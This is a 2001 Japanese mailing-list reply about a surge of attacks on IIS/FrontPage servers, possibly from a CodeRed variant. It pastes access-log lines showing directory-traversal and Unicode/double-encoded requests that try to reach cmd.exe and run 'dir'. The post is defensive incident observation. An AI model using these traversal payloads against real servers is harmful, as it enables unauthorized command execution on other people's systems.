[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[connect24h:04648] Re: FrontPage Server Extensions への攻撃 ?
- To: connect24h@xxxxxxxxxxxxxxxxxxxx
- Subject: [connect24h:04648] Re: FrontPage Server Extensions への攻撃 ?
- From: Yuichi ARATA <arata@xxxxxxxxxxxxxx>
- Date: Tue, 18 Sep 2001 23:53:55 +0900
あらたです。
> > に代表されるような FrontPage Server Extensions (って Windows系?)狙
> > いのクラックが大量にくるようになったのですが、これって何か周期とか、
> > 攻撃先決定ルールとか、あるんでしょうか?
>
> べろべろくるアタックのホストの IPアドレスを調べたら、見事に 1オ
> クテット目が当方の IPアドレスと合致していました。これって、ひょっ
> として CodeRed の亜種でしょうか?
こんなんが来始めました。まだなんなのか裏とりきれてないですが。
あちこちで観測されはじめたよーです。
202.XX.1XX.XX - - [18/Sep/2001:23:40:41 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
202.XX.1XX.XX - - [18/Sep/2001:23:40:41 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
202.XX.1XX.XX - - [18/Sep/2001:23:40:42 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
202.XX.1XX.XX - - [18/Sep/2001:23:40:42 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
202.XX.1XX.XX - - [18/Sep/2001:23:40:43 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
202.XX.1XX.XX - - [18/Sep/2001:23:40:43 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
200.2XX.1XX.X - - [18/Sep/2001:23:40:43 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
200.2XX.1XX.X - - [18/Sep/2001:23:40:43 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
202.XX.1XX.XX - - [18/Sep/2001:23:40:43 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
202.XX.1XX.XX - - [18/Sep/2001:23:40:43 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
202.XX.1XX.XX - - [18/Sep/2001:23:40:44 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
202.XX.1XX.XX - - [18/Sep/2001:23:40:44 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
202.XX.1XX.XX - - [18/Sep/2001:23:40:44 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
202.XX.1XX.XX - - [18/Sep/2001:23:40:44 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
202.XX.1XX.XX - - [18/Sep/2001:23:40:45 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
202.XX.1XX.XX - - [18/Sep/2001:23:40:45 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
202.XX.1XX.XX - - [18/Sep/2001:23:40:46 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
202.XX.1XX.XX - - [18/Sep/2001:23:40:46 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309
200.2XX.1XX.X - - [18/Sep/2001:23:40:46 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
200.2XX.1XX.X - - [18/Sep/2001:23:40:46 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
200.2XX.1XX.X - - [18/Sep/2001:23:40:47 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
200.2XX.1XX.X - - [18/Sep/2001:23:40:47 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
200.2XX.1XX.X - - [18/Sep/2001:23:40:48 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
200.2XX.1XX.X - - [18/Sep/2001:23:40:48 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
200.2XX.1XX.X - - [18/Sep/2001:23:40:49 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
200.2XX.1XX.X - - [18/Sep/2001:23:40:49 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
200.2XX.1XX.X - - [18/Sep/2001:23:40:49 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292
------------------------------------------------------------------------
ニュース速報! はインフォシークで!!
http://www.infoseek.co.jp/Home?pg=Home.html&svx=971122